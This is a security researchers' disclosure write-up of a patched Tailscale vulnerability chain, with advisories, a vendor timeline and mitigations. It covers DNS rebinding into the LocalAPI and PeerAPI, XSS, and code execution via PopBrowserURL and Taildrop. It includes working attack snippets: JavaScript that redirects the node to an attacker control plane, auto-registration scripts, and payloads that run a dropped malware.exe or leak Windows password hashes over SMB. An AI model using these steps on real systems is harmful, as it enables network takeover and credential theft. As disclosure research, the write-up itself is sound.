Jamie McClymont & Emily Trau
Background
Tailscale is a mesh VPN service: nodes on a Tailscale network establish direct Wireguard connections to one another on-demand, using information pushed out by a central control plane (what IPs each node can be found at, what Wireguard public keys they use, which nodes are allowed to access which ports, etc.).
On each node, a process called tailscaled does all the heavy lifting – talking to the control plane, setting up the TUN interface, and carrying packets back and forth. A separate process provides a tray icon and configuration GUI in the Windows taskbar (or the macOS menu bar). On Linux, configuration is performed solely through the tailscale
command-linux utility. These front-end interfaces communicate with tailscaled
through an HTTP API called the LocalAPI.
On unix platforms, the LocalAPI is bound to an AF_UNIX
socket, with a tiered permission structure (basic read-only access for most unix users, privileged access for root
or another specially designated user).
On Windows, which lacks (or lacked!) AF_UNIX
, the LocalAPI instead binds to a loopback TCP socket, 127.0.0.1:41112
. It checks netstat
to enforce that incoming TCP connections are from the expected Windows user, emulating the unix socket privilege model described above.
In a world where our computers run only trusted code, these two approaches would provide equivalent security to one another. The world we actually live in is much, much, messier.
The Treacherous User Agent
If you visit my website, I am granted the honour and the privilege of executing arbitrary Javascript on your computer.
This is a pretty bad idea, but luckily even the web browser has its limits. If my code asks, for example, to perform an HTTP request to /var/run/tailscale/tailscaled.sock
, I will be laughed out of the V8 engine before I can so much as connect(3)
.
If my code asks to speak to 127.0.0.1:41112
, the browser is a little more receptive... but only a little. The types of requests I can make are limited, and I cannot read the responses.
If, on the other hand, my code asks to speak to my very own website... what could possibly be malicious about that? The browser allows abitrary requests to be made, and responses to be read.
This last idea is known as the Same-Origin Policy, and is a critical layer of asbestos fireproofing keeping the modern web from going up in flames.
Unfortunately, the Same-Origin Policy is somewhat flawed in its interpretation of what is and is not "my website". Let's say I host my website at the memorable domain of s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it
:
$ host s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it
s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it has address1.2.3.4
$ host s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it
s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it has address127.0.0.1
When my web page (which was initially loaded from a server at 1.2.3.4
) wishes the make a request to its own domain, the browser will check with DNS again, just in case I've decided to move my web server down the street in the time since you loaded the page. Surprisingly, I have! My web server is now located at 127.0.0.1
!
The browser dutifully carries out the request to this new IP address, without ever deeming the request to be Cross-Origin, since the domain of the webpage matches the domain of the new request. This is called a DNS Rebinding attack.
Issue 1 - LocalAPI vulnerable to DNS Rebinding on Windows
CVE: CVE-2022-41924
Advisory: TS-2022-004
Resolved in 1.32.3
(Host
header allowlist implemented)
Applying this technique, our malicious website can make arbitrary requests to the LocalAPI. Since the API does not apply any additional authentication, apart from checking that our browser is running as the same Windows user as the Tailscale GUI, we have full privileges, and can introspect and reconfigure tailscaled
to taste.
What will we do with our newfound abilities?
Information Disclosure
The status
and whois
endpoints expose details (hostnames, TS and real IP addresses, service lists) of the machines on the tailnet, as well as the names, email addresses, and profile pictures of machines' owners.
We can also learn the Wireguard private key used by the node. This is sanitised when the preferences are requested:
GET /localapi/v0/prefs HTTP/1.1
...
"PrivateNodeKey": "privkey:0000000000000000000000000000000000000000000000000000000000000000",
...
...but is revealed when preferences are updated:
PATCH /localapi/v0/prefs HTTP/1.1
{}
...
"PrivateNodeKey": "privkey:d8e0d574e0ef19adafe8ed83b6068f6dd47c4c2e3062342f4673c63488e5f75e",
...
This key should allow us to impersonate the targeted Windows node on the tailnet, opening Wireguard connections and accessing private services that should not be exposed to us. Unfortunately, there are some additional custom packets required to talk to a Tailscale node on top of pure Wireguard. The relevant code is open source, but using it would require writing an unconscionable amount of Go. Thus, we move on...
Becoming the Control Plane
A PATCH
to /localapi/v0/prefs
can be used to update ControlURL
, moving the machine to an attacker-controlled control plane server, away from the default of https://controlplane.tailscale.com
. The third-party open-source control plane server implementation, Headscale, will serve our purposes nicely.
Unfortunately, the ControlURL
change doesn't take effect until the Tailscale client is restarted. In practice, this will likely mean waiting for the whole machine to reboot – likely not an insurmountable restriction in the age of automatic Windows Update installation.
We can process Headscale's logs to automatically accept new machines that appear into our malicious tailnet:
while(<>){/(?<=ter\/)nodekey:\w*/&&headscale -n meow nodes register --key $&}
import re
import subprocess
import sys
seen = set()
r = re.compile(rb"(?<=/register/)nodekey:[^ ]*")
for line in sys.stdin.buffer:
if (match := r.search(line)):
if match not in seen:
subprocess.run([sys.argv[1], "-n" "meow", "nodes", "register", "--key", match[0].decode()])
seen.add(match)
sys.stdout.buffer.write(line)
Once the machine has rebooted and joined, we can access any network services the machine runs. While we're setting preferences through the LocalAPI, we can also configure the machine to act as an Exit Node, letting us access any other services on the same physical network as the targeted machine.
This sounds like a highly effective attack, as it gives us a position from which to move laterally within the target's traditional network, without running malicious code on the machine (except for the one-off Javascript to reconfigure tailscaled
) – Tailscale is acting as a LOLBin, proxying us into the network.
In practice, access to the local network may not be as exciting a prospect against a Tailscale user as it would against nearly any other target. If they've fully bought in to the Tailscale way of doing things, there probably isn't anything particularly juicy sitting around unfirewalled on the traditional private network.
PopBrowserUR_Shell_
In theory, there is no path for a malicious Tailscale control plane to remotely execute code on your machine, unless you happen to run network services that are designed to allow it, like an SSH server with Tailscale-backed authentication. In practice:
aarch64 Windows doesn't have calc.exe; please accept this notepad-popping as a meager substitute
tailscaled
is constantly long-polling the control plane, waiting for updates to the layout of your network. Sometimes, when you want to perform a privileged action, like SSHing to a locked-down server, Tailscale will ask you to re-authenticate yourself, by including a PopBrowserURL
field in the response.
Issue 2 - Control plane can trigger code execution
Resolved in 1.32.3
through URL filtering
The daemon forwards this URL to the GUI, whose job is to open it in a web browser. The specifics of how this is implemented are unclear, as the GUI component is closed-source, and reverse-engineering Go binaries is about as fun as pulling teeth from an adorable blue gopher. Suffice to say it is implemented sub-optimally, as it allows the control plane to push out arbitrary paths for files to open.
How can we go from "open any path" to "execute any code"? Windows can open executables directly from WebDAV servers, which seems promising! If we push out the URL \\live.sysinternals.com\tools\Procmon64.exe
, Tailscale will download and launch Procmon, but the user will be prompted before the program launches, as the downloaded file bears the Mark of the Web:
We can use another Tailscale feature to bypass the need for user interaction. Taildrop is a super-convenient feature, providing a UI to send files between devices owned by the same user on a tailnet. Taildrop can be enabled/disabled by the tailnet administrator, and it is off by default. Unfortunately, ever since your ControlURL
was changed to point to a malicious server, your tailnet administrator has not been someone with your best interests at heart.
Issue 3 - Taildrop does not apply Mark of the Web
Resolved in 1.32.3
(MOTW and com.apple.quarantine
applied)
From another machine on the Headscale tailnet, we can Taildrop an arbitrary executable which will land on the victim's desktop. This file is not tainted with the Mark of the Web, so Tailscale will be able to launch it without user interaction. All we need to do is find it:
"PopBrowserURL": "C:\Users\___🤷♀️___\Desktop\malware.exe"
Perhaps it is possible to guess the target's Windows username from their email address, which we learned from rebinding to the LocalAPI status
endpoint earlier. Perhaps the target is sitting on a network with an unauthenticated LDAP server, which we can bind to and enumerate usernames, using the victim as an Exit Node. There is a solution which applies much more generally, and like so much of Windows, it's remarkably cursed:
To learn the target's username, we must first learn their password.
"PopBrowserURL": "\\100.64.0.1"
We can ask Tailscale to open a path on an SMB share. Windows being Windows, it will send your username (and a hash of your login password) to this server, unprompted, despite having no reason to consider the server trustworthy.
Since we can make the SMB connection over Tailscale, we bypass any network-level egress filtering of SMB connections, which appears to be a commonly-recommended mitigation against this class of attack.
Now the Windows username is known, we can fill in the blank, and trigger execution of our code:
"PopBrowserURL": "C:\Users\jamie\Desktop\malware.exe"
Demo Time
Having discovered these three bugs, which we believed could be chained for RCE against any Windows Tailscale user, we were content. All that was left was to polish our demo. To do so, we first moved the server hosting the proof-of-concept from a local machine to one in the cloud. A quick re-test in Chrome, and...
None of these words are in the Bible.
This is certainly true of the King James Version, but many of these words can be found in what might as well be the Old Testament of Same-Origin Policy: the WhatWG Fetch Standard, which defines the CORS rules we are being accused of violating.
The Fetch Standard certainly does not define a way for a request targeting the same domain, protocol, and port as the requesting webpage to be considered Cross-Site. Apparently, at some point in the past 2022 years, a whole new standard came about:
Judge not according to the appearance, but judge righteous judgment -- John 7:24
The mitigation described here operates upon the IP address which the user agent actually connects to when loading a particular resource. This check MUST be performed for each new connection made, as DNS rebinding attacks may otherwise trick the user agent into revealing information it shouldn’t. -- WICG Private Network Access Standard §5.3 DNS Rebinding
DNS Rebinding is Dead
The effect of this policy, as currently implemented in Chrome and Edgium, appears to be that a site hosted in public IP address space cannot rebind to one hosted in private IP space. When the proof-of-concept was hosted at 192.168.1.172
, we could attack all browsers just fine, but as soon as we moved it to the internet, these mitigations worked their mitigatory magic.
Firefox does not implement PNA, and is fully exploitable over the public internet using the bugs described above.
The IP addresses considered private by PNA are:
127.0.0.0/8
; the IPv4 loopback space10.0.0.0/8
,172.16.0.0/12
, and192.168.0.0/16
; the RFC1918 IPv4 spaces;169.254.0.0/16
; the IPv4 link-local space- The IPv6-mapped versions of the above
::1/128
; the IPv6 loopback spacefc00::/7
; the IPv6 Unique Local Address spacefe80::/10
; the IPv6 link-local unicast space
IPv6 tailnet addresses are chosen from the fc00::/7
space, so the attack should be usable for lateral movement within a tailnet against users. Notably, this strategy does not require an ACL which allows traffic to :41112
on the attacker's machine, due to the ability to opt out of the firewall previously discussed by Pulse Security.
Using issues 1-3, this gives us:
Windows+Firefox | Windows+Chrome | Non-Windows | |
No special access | Exploitable | Unexploitable? (PNA) | Not vulnerable |
Same local network | Exploitable | Exploitable | Not vulnerable |
Same Tailnet | Exploitable | Exploitable | Not vulnerable |
We just mentioned that IPv6 tailnet addresses are private.
IPv4 Tailscale addresses are not from RFC1918. They are not link-local, and they are certainly not loopback. IPv4 Tailscale addresses are RFC6598 CGNAT addresses, from the 100.64.0.0/10
space, a space that is not considered private by Chrome!
Long Live DNS Rebinding
Tailscaled runs a web server at 100.100.100.100. This is all it does:
Issue 4 - Quad100 vulnerable to DNS Rebinding
Resolved in 1.32.3
(Host
header allowlist implemented)
It ain't much, but it's rebindable, and it lets us learn the target's Tailnet IP address. And unlike the LocalAPI, this one works everywhere, not just Windows!
Hey, what's this?
This is the PeerAPI. It's an API exposed over HTTP, on a predictable port, to other nodes on the Tailnet. It's not used for the core functionality of Tailscale, but for additional features, like Taildrop, as well as for some introspection functionality.
Issue 5 - PeerAPI vulnerable to DNS Rebinding
CVE: CVE-2022-41925
Advisory: TS-2022-005
Resolved in 1.32.3
(Host
header allowlist, introspection locked down)
What address space is it in? That's right, tailnet address space! We can rebind to Quad100, learn the target's tailnet address, calculate their PeerAPI port, rebind to that, dump their environment variables, learn about their other tailnet devices, and send them files via Taildrop.
How Taildrop Works
- When I want to send a file to one of my fellow Tailscale nodes, I connect to its PeerAPI, and PUT a file to
/v0/put/$filename-of-my-choosing
. tailscaled
stores this file in a temporary location. On Windows, that'sC:\ProgramData\Tailscale\files\$email-uid-$uid\$filename-of-my-choosing
.tailscaled
informs the GUI that a new file has arrived- The GUI fetches the file from
tailscaled
through a GET request to the LocalAPI, and saves it to the desktop. - The LocalAPI GET request is served with
Content-Type: text/html
.
Issue 6: Cross-Site Scripting in LocalAPI
Resolved in 1.32.3
through Content-Type
fix, Content-Security-Policy
, and request header checks
Exploiting this XSS issue in practice requires some trickery. As part of handling the LocalAPI GET request, tailscaled will delete the file from the temporary directory, since it has now been moved to its final location. This happens automatically, so we would need to win a race against the GUI to load our HTML before it is destroyed.
Instead, we discovered that if we upload multiple files with the same name to in parallel, the various threads will fight over the shared filename, and some of the requests will end up failing, meaning that the file never gets deleted. We can load the HTML in an iframe
, which is not prohibited by PNA:
<iframe src="http://127.0.0.1:41112/localapi/v0/files/evil.html"></iframe>
Now our Javascript is running in a true LocalAPI origin, we gain equivalent access to what we got from Issue 1, but without Chromium's pesky security features getting in the way.
The path to RCE from here is the same as earlier, but with an extra little bit of polish now available. On the very same day we discovered the XSS vulnerability, the first commits of a new feature were trickling into the main
branch of the Tailscale GitHub repo. Fast User Switching (work in progress, not yet available in a released Tailscale version) allows Tailscale to switch between multiple accounts without logging out and logging in from scratch. As part of this, tailscaled may need to switch to another control plane server, without manually being restarted! We can use this feature to have our target machine join the Headscale tailnet in just a few seconds, no reboot required:
let id =
(await (await fetch("/localapi/v0/profiles/current", { method: "GET" }))
.json()).ID;
await fetch("/localapi/v0/prefs", {
method: "PATCH",
body: JSON.stringify({
ControlURL: "http://1.2.3.4:8080",
ControlURLSet: true,
}),
});
await sleep(1000);
await fetch("/localapi/v0/profiles/", { method: "PUT" });
await sleep(1000);
await fetch("/localapi/v0/profiles/" + id, { method: "POST" });
Demo Time, Again
By chaining issues 4, 5, 6, 2, and 3; we can finally achieve RCE against Chrome users over the public internet:
Issue 7: Your service here vulnerable to DNS rebinding?
Tailscale's documentation tends to encourage a model wherein web services are published to the Tailnet over unencrypted HTTP, and authentication based solely on network position, whether implicitly (services lacking authentication) or explicitly (identifying the user with whois
requests).
While we have not undertaken in-depth research here, we suspect that real-world Tailscale deployments have many high-impact rebindable web services.
Let's compare the Tailscale approach to two alternative models, in the context of DNS rebinding attacks:
BeyondCorp-style HTTPS access proxies
DNS Rebinding attacks generally don't work against HTTPS services: if the target's browser loads https://toggle-between-attacker-and-webmail.attacker.com
and reaches out to the legitimate webmail server, it will be presented with a TLS certificate which does not match the rebound domain, and will throw a certificate error.
Implicitly-trusted flat network with internal HTTP services, traditional VPNs
Traditionally, this case would be equivalent to the Tailscale case. However, the advent of Private Network Access protection in Chromium-based browsers ends up providing what appears to be effective protection against rebinding attacks for these browsers in traditional private networks – protection which is unfortunately not extended to Tailscale customers.
Recommendations
This is a thorny issue, and we don't see an obvious mitigation for Tailscale to implement. The onus thus shifts to Tailscale's customers.
If you run non-HTTPS web services on your Tailnet, and those services are unauthenticated or rely on Tailscale for authentication, implement an allowlist of expected HTTP Host
headers to prevent malicious Javascript from accessing these services.
This mitigation can be tested with curl
– if you can put something random in the Host
header, and you can view information or take actions which should not be available to the public, action is required:
Alternatively, you can use Tailscale's built-in TLS certificate support to run internal services with HTTPS (and with HTTP disabled or just redirecting to HTTPS), either directly or via something like caddy.
Tailscale has published remediation advice for this issue here.
Timeline and Vendor Response
The speed and quality of Tailscale's response to our report is unlike any vendor interaction I have experienced, and suggests a deep commitment to keeping their customers safe.
Times in NZDT (UTC+13):
- Mon 7 November: Emily starts research, identifies LocalAPI as rebindable
- Thu 10 November: Jamie joins research
- ...hacking in progress...
- Wed 16 November, 12:07AM: Report sent to [email protected], covering all 7 issues
- Wed 16 November, 2:04AM: Confirmation of receipt
- Wed 16 November, 4:54AM-9:11AM: Fixes for issues 1/2/4/5/6 committed, including several additional high-quality defence-in-depth mitigations on top of our suggested fixes
- Wed 16 November, 8:36AM: A bunch of Tailscale people are on a train. I'm not really certain how this affects things, but it's pretty cool
- Wed 16 November, 10:52AM: Full reply from Tailscale, containing:
- Details of all fixes made so far;
- Plans for additional fixes yet to be made, review of logs to check for past exploitation, etc;
- Request for our input on the completeness of the fix;
- Estimate of coordinted disclosure timeline;
- Vouchers for Tailscale Personal Pro accounts & Tailscale Merch;
- Offer of US$10,000 bounty, despite the Security page explicitly saying they do not have a bounty program!
- Wed 16 November, 4:17PM: We confirm that the major issues are resolved
- ...discussion and implementation of additional defense-in-depth measures; issue 3 resolved...
- Sat 19 November: Coordinated Disclosure time proposed by Tailscale, accepted by us, Tailscale shares planned Security Bulletins and blog post
- Tue 22 November, 5:06AM: Blog draft shared with Tailscale (a bit last minute, sorry!!!)
- Tue 22 November, 7:00AM: Coordinated disclosure time
Reccomendations
Update to Tailscale v1.32.3, which was released today. Note that Tailscale does not automatically update itself. Administrators can see the current version running on all devices on the Tailscale admin page.
In descending order of priority, update:
- Windows machines with web browsers
- Other machines with web browsers
- Machines without web browsers
See Tailscale's blog post and bulletins (TS-2022-004 and TS-2022-005).
If you run non-HTTPS web services on your Tailnet, and those services are unauthenticated or rely on Tailscale for authentication, implement an allowlist of expected HTTP Host
headers to prevent malicious Javascript from accessing these services.
This mitigation can be tested with curl
– if you can put something random in the Host
header, and you can view information or take actions which should not be available to the public, action is required:
Alternatively, you can use Tailscale's built-in TLS certificate support to run internal services with HTTPS (and with HTTP disabled or just redirecting to HTTPS), either directly or via something like caddy.
Tailscale has published remediation advice for this issue here.
Keep using Tailscale! 💕
The speed and quality of Tailscale's response to our report is unlike any vendor interaction I have experienced, and suggests a deep commitment to keeping their customers safe.